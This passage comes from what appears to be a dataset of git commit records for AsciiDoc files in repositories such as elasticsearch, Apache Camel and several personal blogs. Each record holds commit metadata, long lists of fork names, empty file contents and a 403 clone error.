anbo\/elasticsearch,petabytedata\/elasticsearch,feiqitian\/elasticsearch,nomoa\/elasticsearch,schonfeld\/elasticsearch,kubum\/elasticsearch,kenshin233\/elasticsearch,btiernay\/elasticsearch,mmaracic\/elasticsearch,apepper\/elasticsearch,SergVro\/elasticsearch,smflorentino\/elasticsearch,wuranbo\/elasticsearch,hechunwen\/elasticsearch,avikurapati\/elasticsearch,artnowo\/elasticsearch,jsgao0\/elasticsearch,markharwood\/elasticsearch,milodky\/elasticsearch,Chhunlong\/elasticsearch,xingguang2013\/elasticsearch,wayeast\/elasticsearch,sneivandt\/elasticsearch,njlawton\/elasticsearch,micpalmia\/elasticsearch,brandonkearby\/elasticsearch,sauravmondallive\/elasticsearch,yynil\/elasticsearch,khiraiwa\/elasticsearch,rento19962\/elasticsearch,mnylen\/elasticsearch,franklanganke\/elasticsearch,ydsakyclguozi\/elasticsearch,ImpressTV\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,andrejserafim\/elasticsearch,mm0\/elasticsearch,jeteve\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,socialrank\/elasticsearch,wimvds\/elasticsearch,heng4fun\/elasticsearch,hanswang\/elasticsearch,pranavraman\/elasticsearch,Fsero\/elasticsearch,dongjoon-hyun\/elasticsearch,ESamir\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra-test,Kakakakakku\/elasticsearch,mgalushka\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,petmit\/elasticsearch,ouyangkongtong\/elasticsearch,areek\/elasticsearch,Liziyao\/elasticsearch,lydonchandra\/elasticsearch,vingupta3\/elasticsearch,apepper\/elasticsearch,loconsolutions\/elasticsearch,glefloch\/elasticsearch,kubum\/elasticsearch,jsgao0\/elasticsearch,awislowski\/elasticsearch,s1monw\/elasticsearch,sdauletau\/elasticsearch,xuzha\/elasticsearch,szroland\/elasticsearch,mortonsykes\/elasticsearch,kkirsche\/elasticsearch,jchampion\/elasticsearch,myelin\/elasticsearch,Siddartha07\/elasticsearch,infusionsoft\/elasticsearch,IanvsPoplicola\/elasticsearch,TonyChai24\/ESSource,micpalmia\/elasticsearch,kimimj\/elasticsearch,bestwpw\/elasticsearch,linglaiyao1314\/elasticsearch,nezirus\/elasticsearch,myelin\/elasticsearch,markllama\/elasticsearch,truemped\/elasticsearch,HarishAtGitHub\/elasticsearch,drewr\/elasticsearch,sarwarbhuiyan\/elasticsearch,diendt\/elasticsearch,apepper\/elasticsearch,nellicus\/elasticsearch,acchen97\/elasticsearch,tsohil\/elasticsearch,kalimatas\/elasticsearch,nazarewk\/elasticsearch,chirilo\/elasticsearch,smflorentino\/elasticsearch,vrkansagara\/elasticsearch,kalburgimanjunath\/elasticsearch,andrestc\/elasticsearch,tkssharma\/elasticsearch,rhoml\/elasticsearch,MetSystem\/elasticsearch,hafkensite\/elasticsearch,drewr\/elasticsearch,vroyer\/elasticassandra,yuy168\/elasticsearch,kkirsche\/elasticsearch,LewayneNaidoo\/elasticsearch,snikch\/elasticsearch,jw0201\/elastic,yynil\/elasticsearch,mm0\/elasticsearch,HonzaKral\/elasticsearch,xpandan\/elasticsearch,jango2015\/elasticsearch,qwerty4030\/elasticsearch,mortonsykes\/elasticsearch,wuranbo\/elasticsearch,khiraiwa\/elasticsearch,mnylen\/elasticsearch,humandb\/elasticsearch,lightslife\/elasticsearch,iantruslove\/elasticsearch,ThalaivaStars\/OrgRepo1,alexkuk\/elasticsearch","old_file":"docs\/reference\/docs\/update.asciidoc","new_file":"docs\/reference\/docs\/update.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"705951bf05f9df52b5e7392bad8cc394b6077e38","subject":"Added 
javascript language to gitbook","message":"Added javascript language to gitbook\n","repos":"jarst\/camel,allancth\/camel,RohanHart\/camel,ssharma\/camel,sabre1041\/camel,lburgazzoli\/apache-camel,JYBESSON\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,RohanHart\/camel,mgyongyosi\/camel,objectiser\/camel,zregvart\/camel,scranton\/camel,tdiesler\/camel,chirino\/camel,bhaveshdt\/camel,isavin\/camel,gautric\/camel,mcollovati\/camel,kevinearls\/camel,sverkera\/camel,alvinkwekel\/camel,RohanHart\/camel,jonmcewen\/camel,curso007\/camel,prashant2402\/camel,rmarting\/camel,CodeSmell\/camel,tkopczynski\/camel,nboukhed\/camel,tkopczynski\/camel,w4tson\/camel,curso007\/camel,jkorab\/camel,akhettar\/camel,driseley\/camel,curso007\/camel,isavin\/camel,snurmine\/camel,drsquidop\/camel,isavin\/camel,lburgazzoli\/apache-camel,NickCis\/camel,jarst\/camel,w4tson\/camel,veithen\/camel,neoramon\/camel,pkletsko\/camel,rmarting\/camel,prashant2402\/camel,Fabryprog\/camel,gnodet\/camel,neoramon\/camel,pax95\/camel,gilfernandes\/camel,akhettar\/camel,tkopczynski\/camel,NickCis\/camel,alvinkwekel\/camel,bgaudaen\/camel,acartapanis\/camel,pkletsko\/camel,adessaigne\/camel,ssharma\/camel,JYBESSON\/camel,w4tson\/camel,jamesnetherton\/camel,veithen\/camel,w4tson\/camel,sabre1041\/camel,dmvolod\/camel,yuruki\/camel,drsquidop\/camel,cunningt\/camel,snurmine\/camel,punkhorn\/camel-upstream,curso007\/camel,jamesnetherton\/camel,hqstevenson\/camel,gnodet\/camel,RohanHart\/camel,apache\/camel,kevinearls\/camel,jonmcewen\/camel,tlehoux\/camel,bhaveshdt\/camel,snurmine\/camel,sverkera\/camel,lburgazzoli\/camel,punkhorn\/camel-upstream,cunningt\/camel,lburgazzoli\/apache-camel,nboukhed\/camel,prashant2402\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,dmvolod\/camel,allancth\/camel,veithen\/camel,pax95\/camel,acartapanis\/camel,tadayosi\/camel,ssharma\/camel,jarst\/camel,yuruki\/camel,chirino\/camel,adessaigne\/camel,objectiser\/camel,adessaigne\/camel,anton-k11\/camel,salikjan\/camel,pmoerenhout\/camel,akhettar\/camel,christophd\/camel,tadayosi\/camel,chirino\/camel,snurmine\/camel,jarst\/camel,kevinearls\/camel,pax95\/camel,prashant2402\/camel,anoordover\/camel,ullgren\/camel,jamesnetherton\/camel,lburgazzoli\/camel,DariusX\/camel,curso007\/camel,Thopap\/camel,JYBESSON\/camel,sirlatrom\/camel,davidkarlsen\/camel,neoramon\/camel,scranton\/camel,JYBESSON\/camel,sirlatrom\/camel,salikjan\/camel,anton-k11\/camel,lburgazzoli\/camel,jkorab\/camel,acartapanis\/camel,bhaveshdt\/camel,onders86\/camel,christophd\/camel,tlehoux\/camel,snurmine\/camel,pmoerenhout\/camel,ssharma\/camel,driseley\/camel,w4tson\/camel,Thopap\/camel,tlehoux\/camel,pmoerenhout\/camel,jkorab\/camel,DariusX\/camel,tdiesler\/camel,anoordover\/camel,jamesnetherton\/camel,driseley\/camel,anton-k11\/camel,onders86\/camel,gautric\/camel,gautric\/camel,gilfernandes\/camel,CodeSmell\/camel,anton-k11\/camel,pax95\/camel,onders86\/camel,Fabryprog\/camel,nboukhed\/camel,JYBESSON\/camel,sverkera\/camel,jonmcewen\/camel,mgyongyosi\/camel,lburgazzoli\/apache-camel,lburgazzoli\/camel,prashant2402\/camel,DariusX\/camel,dmvolod\/camel,drsquidop\/camel,nikhilvibhav\/camel,jkorab\/camel,chirino\/camel,jamesnetherton\/camel,allancth\/camel,yuruki\/camel,DariusX\/camel,isavin\/camel,pkletsko\/camel,anton-k11\/camel,tkopczynski\/camel,sirlatrom\/camel,alvinkwekel\/camel,gilfernandes\/camel,jonmcewen\/camel,nboukhed\/camel,mgyongyosi\/camel,lburgazzoli\/camel,onders86\/camel,rmarting\/camel,adessaigne\/camel,zregvart\/camel,zregvart\/camel,NickCis\/camel,bhaveshdt\/camel,
veithen\/camel,cunningt\/camel,yuruki\/camel,nikhilvibhav\/camel,adessaigne\/camel,christophd\/camel,tdiesler\/camel,ullgren\/camel,rmarting\/camel,tkopczynski\/camel,CodeSmell\/camel,tlehoux\/camel,pkletsko\/camel,NickCis\/camel,drsquidop\/camel,apache\/camel,tlehoux\/camel,davidkarlsen\/camel,pmoerenhout\/camel,neoramon\/camel,mgyongyosi\/camel,anoordover\/camel,kevinearls\/camel,objectiser\/camel,nboukhed\/camel,ssharma\/camel,nicolaferraro\/camel,scranton\/camel,isavin\/camel,acartapanis\/camel,davidkarlsen\/camel,rmarting\/camel,jarst\/camel,jkorab\/camel,dmvolod\/camel,scranton\/camel,neoramon\/camel,jarst\/camel,tkopczynski\/camel,pax95\/camel,akhettar\/camel,gnodet\/camel,driseley\/camel,hqstevenson\/camel,sabre1041\/camel,apache\/camel,christophd\/camel,yuruki\/camel,scranton\/camel,gautric\/camel,bhaveshdt\/camel,ullgren\/camel,nicolaferraro\/camel,hqstevenson\/camel,anoordover\/camel,mgyongyosi\/camel,pax95\/camel,drsquidop\/camel,kevinearls\/camel,snurmine\/camel,mcollovati\/camel,zregvart\/camel,onders86\/camel,nikhilvibhav\/camel,bgaudaen\/camel,tadayosi\/camel,christophd\/camel,ssharma\/camel,sirlatrom\/camel,jkorab\/camel,driseley\/camel,allancth\/camel,Thopap\/camel,gnodet\/camel,tadayosi\/camel,apache\/camel,rmarting\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,veithen\/camel,objectiser\/camel,tdiesler\/camel,allancth\/camel,Thopap\/camel,gautric\/camel,veithen\/camel,tlehoux\/camel,sabre1041\/camel,pmoerenhout\/camel,gilfernandes\/camel,NickCis\/camel,sabre1041\/camel,CodeSmell\/camel,ullgren\/camel,mcollovati\/camel,allancth\/camel,apache\/camel,gilfernandes\/camel,acartapanis\/camel,bgaudaen\/camel,sverkera\/camel,hqstevenson\/camel,hqstevenson\/camel,sverkera\/camel,anoordover\/camel,anoordover\/camel,gnodet\/camel,akhettar\/camel,yuruki\/camel,Thopap\/camel,jamesnetherton\/camel,tdiesler\/camel,davidkarlsen\/camel,cunningt\/camel,nicolaferraro\/camel,dmvolod\/camel,neoramon\/camel,jonmcewen\/camel,acartapanis\/camel,RohanHart\/camel,gautric\/camel,alvinkwekel\/camel,NickCis\/camel,Fabryprog\/camel,chirino\/camel,Thopap\/camel,akhettar\/camel,sverkera\/camel,prashant2402\/camel,punkhorn\/camel-upstream,w4tson\/camel,tdiesler\/camel,lburgazzoli\/apache-camel,apache\/camel,hqstevenson\/camel,anton-k11\/camel,christophd\/camel,gilfernandes\/camel,cunningt\/camel,pkletsko\/camel,chirino\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,isavin\/camel,sirlatrom\/camel,mgyongyosi\/camel,nicolaferraro\/camel,drsquidop\/camel,bgaudaen\/camel,kevinearls\/camel,lburgazzoli\/camel,nboukhed\/camel,bgaudaen\/camel,JYBESSON\/camel,pkletsko\/camel,curso007\/camel,driseley\/camel,sabre1041\/camel,scranton\/camel,onders86\/camel,dmvolod\/camel,RohanHart\/camel,Fabryprog\/camel,tadayosi\/camel,bgaudaen\/camel,mcollovati\/camel,sirlatrom\/camel","old_file":"components\/camel-script\/src\/main\/docs\/javaScript-language.adoc","new_file":"components\/camel-script\/src\/main\/docs\/javaScript-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"675c46481ee9bb098fb17282b9ff95e3f4ed9376","subject":"start to translate README to Chinese.","message":"start to translate README to Chinese.\n","repos":"asciidoctor\/asciidoctor-diagram","old_file":"README_zh-CN.adoc","new_file":"README_zh-CN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/asciidoctor\/asciidoctor-diagram.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d6edd22403cbb6c37710df3e11b03eddfc2c078","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a07023c5dffcadf8b7440238acd7ad296245877","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2447e1d42520e848a76d3e10a7fc27d62ca95382","subject":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","message":"Update 2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_file":"_posts\/2017-03-25-Drop-handkerchief-with-M-E-M-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d7c7fc8f22e3fb6e78de3e3ad570c6ea1e8ae0bf","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58027bd644a948376ac63fcf219a021dccbf7e53","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"7d854fa7113502cb92b32bb323e737c4794aa04f","subject":"Update 2016-11-16-Hacking-Daily-News-161116.adoc","message":"Update 2016-11-16-Hacking-Daily-News-161116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-16-Hacking-Daily-News-161116.adoc","new_file":"_posts\/2016-11-16-Hacking-Daily-News-161116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75bb19b0d1c6707c89abd560649ce425f816ab1e","subject":"Importing CIP2013-09-11","message":"Importing CIP2013-09-11\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2013-09-11.asciidoc","new_file":"cip\/CIP2013-09-11.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d83ca0cbc04066203b933c9edffd266d0c32585","subject":"y2b create post V-MODA Crossfade M-100 Headphones Unboxing (Unbox Therapy Edition)","message":"y2b create post V-MODA Crossfade M-100 Headphones Unboxing (Unbox Therapy Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-04-VMODA-Crossfade-M100-Headphones-Unboxing-Unbox-Therapy-Edition.adoc","new_file":"_posts\/2013-07-04-VMODA-Crossfade-M100-Headphones-Unboxing-Unbox-Therapy-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e72a8fc53bf54ef7e2fe78b7e9bee7ba57d7995","subject":"Added skeleton index.adoc","message":"Added skeleton index.adoc\n","repos":"andrewazores\/homepage","old_file":"index.adoc","new_file":"index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andrewazores\/homepage.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"cdbf319a0443fa254b8a2250513ee51638db3b31","subject":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-text-without-semcolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfe2439df92969239146101aeeaf10f769254f3c","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 
2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf0547072f8085e6b4464483320dc2c1c85e11e9","subject":"Update 2016-10-18-some-words.adoc","message":"Update 2016-10-18-some-words.adoc","repos":"crotel\/studio,crotel\/studio,crotel\/studio,crotel\/studio","old_file":"_posts\/2016-10-18-some-words.adoc","new_file":"_posts\/2016-10-18-some-words.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/studio.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cbd15fd6b511bf6651a3c7936b9159a187e9444","subject":"Create Deeper\/newarticle_doc.adoc","message":"Create Deeper\/newarticle_doc.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"Deeper\/newarticle_doc.adoc","new_file":"Deeper\/newarticle_doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"1b33df79a322d287f4405356c6214365e17be9dd","subject":"Update 2016-09-20-Or-Reading-Too-Much-Into-Things.adoc","message":"Update 2016-09-20-Or-Reading-Too-Much-Into-Things.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-09-20-Or-Reading-Too-Much-Into-Things.adoc","new_file":"_posts\/2016-09-20-Or-Reading-Too-Much-Into-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ae8e5d4126728338934d3c971802f5f73f5ce0a","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46f3ff1796b021188c9184399d55c6fc09911088","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 
2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d215496136377cca8ce2819b7202bbaa827adbf","subject":"Renamed '_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc' to '_posts\/2017-07-21-102-Tips-To-Improve-Your-Relationship.adoc'","message":"Renamed '_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc' to '_posts\/2017-07-21-102-Tips-To-Improve-Your-Relationship.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-21-102-Tips-To-Improve-Your-Relationship.adoc","new_file":"_posts\/2017-07-21-102-Tips-To-Improve-Your-Relationship.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63ad90a3a8f8b29d69b06ca08a105c0339d994c2","subject":"Added test skipping to the README","message":"Added test skipping to the README\n","repos":"MisterAndersen\/elasticsearch,feiqitian\/elasticsearch,jsgao0\/elasticsearch,kunallimaye\/elasticsearch,nezirus\/elasticsearch,zhaocloud\/elasticsearch,Collaborne\/elasticsearch,mjhennig\/elasticsearch,uboness\/elasticsearch,beiske\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,ulkas\/elasticsearch,clintongormley\/elasticsearch,Shekharrajak\/elasticsearch,huanzhong\/elasticsearch,elancom\/elasticsearch,JackyMai\/elasticsearch,skearns64\/elasticsearch,cwurm\/elasticsearch,masaruh\/elasticsearch,Liziyao\/elasticsearch,jpountz\/elasticsearch,dylan8902\/elasticsearch,jw0201\/elastic,dylan8902\/elasticsearch,pranavraman\/elasticsearch,pritishppai\/elasticsearch,strapdata\/elassandra-test,beiske\/elasticsearch,KimTaehee\/elasticsearch,EasonYi\/elasticsearch,zhiqinghuang\/elasticsearch,rento19962\/elasticsearch,fekaputra\/elasticsearch,LewayneNaidoo\/elasticsearch,lydonchandra\/elasticsearch,springning\/elasticsearch,socialrank\/elasticsearch,abibell\/elasticsearch,MaineC\/elasticsearch,Charlesdong\/elasticsearch,xingguang2013\/elasticsearch,strapdata\/elassandra-test,tkssharma\/elasticsearch,kubum\/elasticsearch,sdauletau\/elasticsearch,btiernay\/elasticsearch,marcuswr\/elasticsearch-dateline,camilojd\/elasticsearch,alexbrasetvik\/elasticsearch,kalburgimanjunath\/elasticsearch,GlenRSmith\/elasticsearch,jw0201\/elastic,kenshin233\/elasticsearch,linglaiyao1314\/elasticsearch,sreeramjayan\/elasticsearch,lzo\/elasticsearch-1,andrejserafim\/elasticsearch,kunallimaye\/elasticsearch,henakamaMSFT\/elasticsearch,schonfeld\/elasticsearch,Helen-Zhao\/elasticsearch,awislowski\/elasticsearch,MetSystem\/elasticsearch,liweinan0423\/elasticsearch,wittyameta\/elasticsearch,AshishThakur\/elasticsearch,slavau\/elasticsearch,fred84\/elasticsearch,chrismwendt\/elasticsearch,MisterAndersen\/elasticsearch,vorce\/es-metrics,a2lin\/elasticsearch,lightslife\/elasticsearch,chrismwendt\/elasticsearch,apepper\/elasticsearch,strapdata\/elassandra,nezirus\/elasticse
arch,elancom\/elasticsearch,clintongormley\/elasticsearch,amit-shar\/elasticsearch,alexkuk\/elasticsearch,pablocastro\/elasticsearch,adrianbk\/elasticsearch,Kakakakakku\/elasticsearch,AshishThakur\/elasticsearch,naveenhooda2000\/elasticsearch,zhaocloud\/elasticsearch,sreeramjayan\/elasticsearch,aglne\/elasticsearch,chirilo\/elasticsearch,kubum\/elasticsearch,sjohnr\/elasticsearch,abibell\/elasticsearch,queirozfcom\/elasticsearch,libosu\/elasticsearch,Brijeshrpatel9\/elasticsearch,Shekharrajak\/elasticsearch,jimhooker2002\/elasticsearch,loconsolutions\/elasticsearch,lchennup\/elasticsearch,likaiwalkman\/elasticsearch,lchennup\/elasticsearch,kubum\/elasticsearch,beiske\/elasticsearch,yuy168\/elasticsearch,girirajsharma\/elasticsearch,alexksikes\/elasticsearch,cwurm\/elasticsearch,jango2015\/elasticsearch,MjAbuz\/elasticsearch,truemped\/elasticsearch,linglaiyao1314\/elasticsearch,elancom\/elasticsearch,onegambler\/elasticsearch,tsohil\/elasticsearch,khiraiwa\/elasticsearch,fekaputra\/elasticsearch,naveenhooda2000\/elasticsearch,Uiho\/elasticsearch,truemped\/elasticsearch,diendt\/elasticsearch,fooljohnny\/elasticsearch,hanswang\/elasticsearch,winstonewert\/elasticsearch,abibell\/elasticsearch,linglaiyao1314\/elasticsearch,nomoa\/elasticsearch,achow\/elasticsearch,ajhalani\/elasticsearch,wayeast\/elasticsearch,markwalkom\/elasticsearch,jsgao0\/elasticsearch,winstonewert\/elasticsearch,markllama\/elasticsearch,kevinkluge\/elasticsearch,strapdata\/elassandra-test,kingaj\/elasticsearch,opendatasoft\/elasticsearch,rento19962\/elasticsearch,jchampion\/elasticsearch,nrkkalyan\/elasticsearch,wittyameta\/elasticsearch,Uiho\/elasticsearch,mbrukman\/elasticsearch,artnowo\/elasticsearch,dantuffery\/elasticsearch,geidies\/elasticsearch,fernandozhu\/elasticsearch,boliza\/elasticsearch,episerver\/elasticsearch,knight1128\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sposam\/elasticsearch,chirilo\/elasticsearch,gfyoung\/elasticsearch,rmuir\/elasticsearch,lzo\/elasticsearch-1,tahaemin\/elasticsearch,Collaborne\/elasticsearch,JSCooke\/elasticsearch,bestwpw\/elasticsearch,infusionsoft\/elasticsearch,sauravmondallive\/elasticsearch,vvcephei\/elasticsearch,jimhooker2002\/elasticsearch,TonyChai24\/ESSource,javachengwc\/elasticsearch,huypx1292\/elasticsearch,abhijitiitr\/es,awislowski\/elasticsearch,rento19962\/elasticsearch,davidvgalbraith\/elasticsearch,hirdesh2008\/elasticsearch,dataduke\/elasticsearch,koxa29\/elasticsearch,kevinkluge\/elasticsearch,iantruslove\/elasticsearch,TonyChai24\/ESSource,schonfeld\/elasticsearch,alexkuk\/elasticsearch,YosuaMichael\/elasticsearch,njlawton\/elasticsearch,jimhooker2002\/elasticsearch,ZTE-PaaS\/elasticsearch,kimimj\/elasticsearch,xuzha\/elasticsearch,VukDukic\/elasticsearch,TonyChai24\/ESSource,mjason3\/elasticsearch,sdauletau\/elasticsearch,winstonewert\/elasticsearch,fubuki\/elasticsearch,mcku\/elasticsearch,sauravmondallive\/elasticsearch,NBSW\/elasticsearch,mohit\/elasticsearch,StefanGor\/elasticsearch,gmarz\/elasticsearch,yongminxia\/elasticsearch,skearns64\/elasticsearch,huanzhong\/elasticsearch,diendt\/elasticsearch,EasonYi\/elasticsearch,iantruslove\/elasticsearch,huypx1292\/elasticsearch,Liziyao\/elasticsearch,sc0ttkclark\/elasticsearch,MaineC\/elasticsearch,franklanganke\/elasticsearch,masaruh\/elasticsearch,kkirsche\/elasticsearch,jbertouch\/elasticsearch,rajanm\/elasticsearch,sscarduzio\/elasticsearch,shreejay\/elasticsearch,hanst\/elasticsearch,nrkkalyan\/elasticsearch,henakamaMSFT\/elasticsearch,caengcjd\/elasticsearch,18098924759\/elasticsearch,lightslife\/el
